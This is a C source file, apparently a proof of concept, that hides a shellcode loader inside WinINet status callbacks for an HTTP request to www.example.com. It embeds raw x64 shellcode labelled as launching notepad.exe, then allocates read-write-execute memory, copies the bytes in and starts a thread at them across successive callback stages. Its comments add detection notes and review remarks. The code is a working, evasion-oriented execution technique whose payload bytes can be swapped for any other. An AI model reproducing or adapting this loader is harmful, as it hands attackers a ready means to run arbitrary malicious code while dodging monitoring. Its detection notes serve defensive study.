Created
August 21, 2025 22:51
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
#include <windows.h> | |
#include <wininet.h> | |
#include <stdio.h> | |
#pragma comment(lib, "wininet.lib") | |
// Demo payload, labelled by the author as "notepad.exe shellcode". The final
// 12 bytes are the ASCII string "notepad.exe" followed by a NUL terminator,
// which is consistent with that label. The rest is opaque x64 machine code
// and is not decoded here.
//
// Detection note: the bytes are embedded verbatim as an initialized global, so
// a static byte-pattern rule over the compiled file can match them before any
// code runs.
//
// NOTE(review): the array is plain `char` but many initializers are above
// 0x7f. Where `char` is signed that conversion is implementation-defined and
// compilers typically warn about it; `unsigned char` would state the intent.
char shellcode[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed,
0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88,
0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44,
0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48,
0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1,
0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44,
0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49,
0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a,
0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41,
0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b,
0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47,
0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x6e, 0x6f, 0x74, 0x65, 0x70,
0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00
};
// State shared between callback stages. All three are written by
// InternetStatusCallback(), never by main().
DWORD shellcode_size = 0;   // set to sizeof(shellcode) on INTERNET_STATUS_RESOLVING_NAME
LPVOID exec_addr = NULL;    // result of VirtualAlloc on INTERNET_STATUS_NAME_RESOLVED
HANDLE hThread = NULL;      // thread handle slot; closed on INTERNET_STATUS_REQUEST_SENT
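// WinINet status callback that spreads an allocate / copy / run sequence over
// the notifications of a single HTTP request:
//
//   INTERNET_STATUS_RESOLVING_NAME       -> record sizeof(shellcode)
//   INTERNET_STATUS_NAME_RESOLVED        -> VirtualAlloc(PAGE_EXECUTE_READWRITE)
//   INTERNET_STATUS_CONNECTING_TO_SERVER -> memcpy the payload into the region
//   INTERNET_STATUS_CONNECTED_TO_SERVER  -> CreateThread at the region
//   INTERNET_STATUS_REQUEST_SENT         -> close the thread handle
//
// The remaining statuses only log progress.
//
// Detection notes: moving the calls into a callback does not change what the
// process does. It still commits a private PAGE_EXECUTE_READWRITE region and
// starts a thread whose start address lies inside that region rather than in
// a loaded module; both remain visible to memory-protection and thread-start
// telemetry. What changes is the caller context: the calls are made from
// inside this callback while the WinINet request is in flight.
//
// NOTE(review): every stage assumes the previous notification was delivered.
// The stages are therefore guarded so that a skipped notification or a failed
// allocation leaves the later stages as no-ops instead of writing through or
// starting a thread at a NULL pointer.
//
// Parameters follow the INTERNET_STATUS_CALLBACK prototype. Only
// dwInternetStatus and lpvStatusInformation are used.
void CALLBACK InternetStatusCallback(
    HINTERNET hInternet,
    DWORD_PTR dwContext,
    DWORD dwInternetStatus,
    LPVOID lpvStatusInformation,
    DWORD dwStatusInformationLength
)
{
    (void)hInternet;
    (void)dwContext;
    (void)dwStatusInformationLength;

    switch (dwInternetStatus)
    {
    case INTERNET_STATUS_RESOLVING_NAME:
        if (lpvStatusInformation) printf("[+] Resolving name as:\t\t%S\n", (LPCWSTR)lpvStatusInformation);
        // Stage 1: record the payload length for the later stages.
        shellcode_size = sizeof(shellcode);
        // DWORD is unsigned, so print it with %lu rather than %ld.
        printf("[+] Shellcode size:\t\t%lu\n", shellcode_size);
        break;

    case INTERNET_STATUS_NAME_RESOLVED:
        if (lpvStatusInformation) printf("[+] Name resolved as:\t\t%s\n", (LPCSTR)lpvStatusInformation);
        // Stage 2: private read/write/execute region sized for the payload.
        exec_addr = VirtualAlloc(NULL, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if (!exec_addr)
        {
            // Report the failure; exec_addr stays NULL so later stages skip.
            printf("[-] VirtualAlloc failed: 0x%lx\n", GetLastError());
            break;
        }
        printf("[+] Allocated RWX memory to:\t0x%p\n", exec_addr);
        break;

    case INTERNET_STATUS_CONNECTING_TO_SERVER:
        printf("[+] Connecting to server\n");
        // Stage 3: copy only when stage 2 produced a region.
        if (exec_addr) memcpy(exec_addr, shellcode, shellcode_size);
        break;

    case INTERNET_STATUS_CONNECTED_TO_SERVER:
    {
        DWORD tid;

        if (lpvStatusInformation) printf("[+] Connected to server: %s\n", (LPCSTR)lpvStatusInformation);
        // Stage 4: keep the returned handle so it can be closed on
        // REQUEST_SENT; discarding it would leak the handle.
        if (exec_addr)
        {
            hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec_addr, NULL, 0, &tid);
            if (!hThread) printf("[-] CreateThread failed: 0x%lx\n", GetLastError());
        }
        break;
    }

    case INTERNET_STATUS_SENDING_REQUEST:
        printf("[+] Sending request to server\n");
        break;

    case INTERNET_STATUS_REQUEST_SENT:
        // The byte count is read through the pointer, so check it first.
        if (lpvStatusInformation) printf("[+] Sent %lu bytes as request\n", *(DWORD*)lpvStatusInformation);
        // Stage 5: release the thread handle once; the thread itself keeps running.
        if (hThread)
        {
            CloseHandle(hThread);
            hThread = NULL;
        }
        break;

    case INTERNET_STATUS_RECEIVING_RESPONSE:
        printf("[+] Receiving response from the server\n");
        break;

    case INTERNET_STATUS_RESPONSE_RECEIVED:
        if (lpvStatusInformation) printf("[+] Received %lu bytes as response\n", *(DWORD*)lpvStatusInformation);
        break;

    case INTERNET_STATUS_REQUEST_COMPLETE:
        printf("[+] Request complete\n");
        break;

    case INTERNET_STATUS_CLOSING_CONNECTION:
        printf("[+] Closing connection\n");
        break;

    case INTERNET_STATUS_CONNECTION_CLOSED:
        printf("[+] Closed connection\n");
        break;

    default:
        break;
    }
}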
// Issues one HTTP GET for "/" on www.example.com through WinINet with
// InternetStatusCallback registered on the session handle. The request has
// no other purpose in this file: the response bytes are read into a local
// buffer and never used. Its connection events are what invoke the callback.
//
// Network observables taken from the constants below: the User-Agent string
// "WinINet Status Callback Example/1.0", a direct (no proxy) connection, and
// the default HTTP port.
//
// Returns 1 if the session, the callback registration, the connection, or the
// request handle cannot be created; returns 0 otherwise, including when
// HttpSendRequest fails.
int main()
{
    HINTERNET session;
    HINTERNET connection;
    HINTERNET request;
    INTERNET_STATUS_CALLBACK prior;

    // Open the WinINet session.
    session = InternetOpen(L"WinINet Status Callback Example/1.0", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    if (session == NULL)
    {
        printf("[-] InternetOpen failed: 0x%lx\n", GetLastError());
        return 1;
    }

    // Register the callback on the session handle.
    prior = InternetSetStatusCallback(session, InternetStatusCallback);
    if (prior == INTERNET_INVALID_STATUS_CALLBACK)
    {
        printf("[-] InternetSetStatusCallback failed: 0x%lx\n", GetLastError());
        InternetCloseHandle(session);
        return 1;
    }
    printf("[+] Status callback set successfully!\n");

    // The last argument is the dwContext handed to the callback.
    // NOTE(review): presumably non-zero so that WinINet issues notifications
    // for this handle; confirm against the WinINet documentation.
    connection = InternetConnect(session, L"www.example.com", INTERNET_DEFAULT_HTTP_PORT,
                                 NULL, NULL, INTERNET_SERVICE_HTTP, 0, 1);
    if (connection == NULL)
    {
        printf("[-] InternetConnect failed: 0x%lx\n", GetLastError());
        InternetCloseHandle(session);
        return 1;
    }

    // Build the GET request; 2 is this handle's dwContext value.
    request = HttpOpenRequest(connection, L"GET", L"/", NULL, NULL, NULL, INTERNET_FLAG_RELOAD, 2);
    if (request == NULL)
    {
        printf("[-] HttpOpenRequest failed: 0x%lx\n", GetLastError());
        InternetCloseHandle(connection);
        InternetCloseHandle(session);
        return 1;
    }

    // Send it. A failure is reported but still falls through to cleanup.
    if (!HttpSendRequest(request, NULL, 0, NULL, 0))
    {
        printf("[-] HttpSendRequest failed: 0x%lx\n", GetLastError());
    }
    else
    {
        printf("[+] Request sent successfully!\n");
        // A single read; its result and the data are not inspected.
        char buffer[1024];
        DWORD bytesRead = 0;
        InternetReadFile(request, buffer, sizeof(buffer) - 1, &bytesRead);
    }

    // Release child handles first, detach the callback, then close the session.
    if (request != NULL) InternetCloseHandle(request);
    if (connection != NULL) InternetCloseHandle(connection);
    InternetSetStatusCallback(session, NULL);
    if (session != NULL) InternetCloseHandle(session);
    return 0;
}